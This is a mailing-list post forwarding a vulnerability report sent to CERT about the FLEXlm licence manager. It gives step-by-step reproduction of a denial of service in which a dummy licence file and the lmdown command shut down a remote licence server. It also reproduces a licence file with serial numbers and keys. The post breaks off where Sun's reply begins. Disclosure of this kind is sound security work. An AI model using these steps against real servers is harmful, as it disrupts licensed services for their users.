I'm new to this mailing list, so if the format of this report is incorrect or inappropriate, please don't flame me too much. This is a copy of a report I sent to the CERT some time ago about Highland's FLEXlm software. I've just been told that what I describe here as a denial of service *attack* is causing serious problems in one of our departments simply through *accident*. I've removed the Sun engineer's name from the included message in case anyone decides to blame the messenger. ----- Included: Message to the CERT ----- The following is a description of what I believe to be a serious vulnerability in the widely used FLEXlm network licensing package written by Highland Software. You probably know about it already, but just in case you don't, here goes... *** Synopsis: The root user on an arbitrary network-connected machine with the FLEXlm software can cause the FLEXlm licence manager daemon on any network- accessible licence server to shut down using the FLEXlm lmdown command. *** Scenario: Two machines: alpha and beta. Alpha is running the FLEXlm licence server software. Alpha does not "trust" beta in any way. Beta has a copy of the FLEXlm software too, and in particular has the lmdown program. On beta a one line dummy licence data file is created in /etc/licence.dat pointing at alpha: SERVER alpha 7260057c 1700 (The hostid "7260057c" is not alpha's; it is deliberately incorrect.) alpha's licence data file is SERVER alpha 7260057b 1700 DAEMON suntechd /opt/SUNWspro/bin # Serial No FX2811-162-13 # 1 user license for SPARCompiler_C 2.0FCS, Expires: Never FEATURE sunpro.c suntechd 2.000 1-jan-0 1 EBA8B0F1534F569284CD "" # Serial No FX6696-16201-10 # 1 user license for SPARCompiler_Fortran 2.01FCS, Expires: Never FEATURE sunpro.f77 suntechd 2.010 1-jan-0 1 8B7850316C56E1F2467B "" # Serial No FX3928-16301-4 # 1 user license for SPARCompiler_C++ 3.01FCS, Expires: Never FEATURE sunpro.cc suntechd 3.010 1-jan-0 1 BBA86001599F95AC7CE7 "" # Serial No FX11-4036301-7 - using FX6-4026301-7 FX1667-16301-7 # 3 user license for SPARCompiler_Pascal 3.01FCS, Expires: Never FEATURE sunpro.pc suntechd 3.010 1-jan-0 3 8BD84051269969C54B14 "" # Serial No FX128-162-1 # 1 user license for SPARCworks 2.0FCS, Expires: Never FEATURE sunpro.sparcworks.tools suntechd 2.000 1-jan-0 1 3B38D011304C4D636ADA "" On beta I give the following instructions as root: # lmdown -c /etc/licence.dat lmdown - Copyright (C) 1989, 1991 Highland Software, Inc. Shutting down FLEXlm on nodes: alpha Are you sure? [y/n]: y Shut down node alpha # and alpha's licence serving is indeed shut down. *** Action so far: I reported this as a bug to Sun, who supplied us with the FLEXlm software as part of their compiler kit. (Though I don't regard it as a Sun-specific problem; I think this is a function purely of the FLEXlm software.) I enclose their response: ----- Included message: -----